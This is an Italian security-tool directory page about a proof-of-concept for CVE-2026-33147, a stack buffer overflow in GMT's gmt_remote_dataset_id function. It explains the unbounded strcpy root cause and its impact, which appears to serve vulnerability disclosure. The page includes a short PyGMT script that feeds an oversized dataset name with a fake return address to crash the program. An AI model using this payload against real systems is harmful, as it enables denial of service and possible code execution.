Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-33147 — Proof-of-concept exploit per un buffer overflow basato su stack in `gmt_remote_dataset_id` di GMT, che dimostra il crash e la potenziale esecuzione di codice tramite nomi di dataset appositamente modificati. | Kitploit
Strumenti/GitHubGitHub/redyank/cve-2026-33147
Analisi delle VulnerabilitàExploitBinary Exploitation
GitHubredyank/cve-2026-33147

CVE-2026-33147

Proof-of-concept exploit per un buffer overflow basato su stack in `gmt_remote_dataset_id` di GMT, che dimostra il crash e la potenziale esecuzione di codice tramite nomi di dataset appositamente modificati.

Vedi Repository
14 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-33147

CVE-2026-33147 (Stack-based Buffer Overflow in gmt_remote_dataset_id)

Riepilogo

È stata identificata una vulnerabilità di buffer overflow basato su stack nella funzione gmt_remote_dataset_id all'interno di src/gmt_remote.c. Il problema si verifica quando una stringa lunga appositamente predisposta viene passata come identificatore di dataset (ad esempio, tramite il modulo which), causando un crash o una potenziale esecuzione arbitraria di codice.

Dettagli

La vulnerabilità è causata dall'uso non sicuro di strcpy (o operazioni simili su stringhe senza limiti) durante la copia di un nome di dataset controllato dall'utente in un buffer di stack a dimensione fissa file[PATH_MAX].

  • Funzione vulnerabile: gmt_remote_dataset_id
  • File vulnerabile: src/gmt_remote.c
  • Causa principale: mancanza di validazione della lunghezza dell'input prima della copia in un buffer di stack.

Quando un input supera PATH_MAX (tipicamente 4096 byte), sovrascrive il frame di stack, incluso l'indirizzo di ritorno. Ciò è stato confermato utilizzando AddressSanitizer (ASan), che ha segnalato uno stack-buffer-overflow.

PoC

Il seguente script Python che utilizza PyGMT riproduce il crash:

root@kitploit:~
import struct
from pygmt.clib import Session

with Session() as lib:
    # Payload progettato per causare l'overflow del buffer di stack
    padding = "A" * 4096
    fake_ret = struct.pack("<Q", 0x4141414141414141) * 100
    payload = padding + fake_ret.decode("latin-1")
    
    # Attiva l'overflow tramite il modulo 'which'
    lib.call_module("which", [payload])

Impatto

Questa è una vulnerabilità di sicurezza della memoria.

  • Chi è interessato: qualsiasi utente o applicazione che utilizza GMT tramite l'API C o interfacce di livello superiore come PyGMT che elaborano nomi di dataset non attendibili.
  • Conseguenze: come minimo, causa un Denial of Service (DoS) tramite il crash del programma. In determinati ambienti, potrebbe potenzialmente essere sfruttata per l'esecuzione arbitraria di codice.
Scarica lo strumento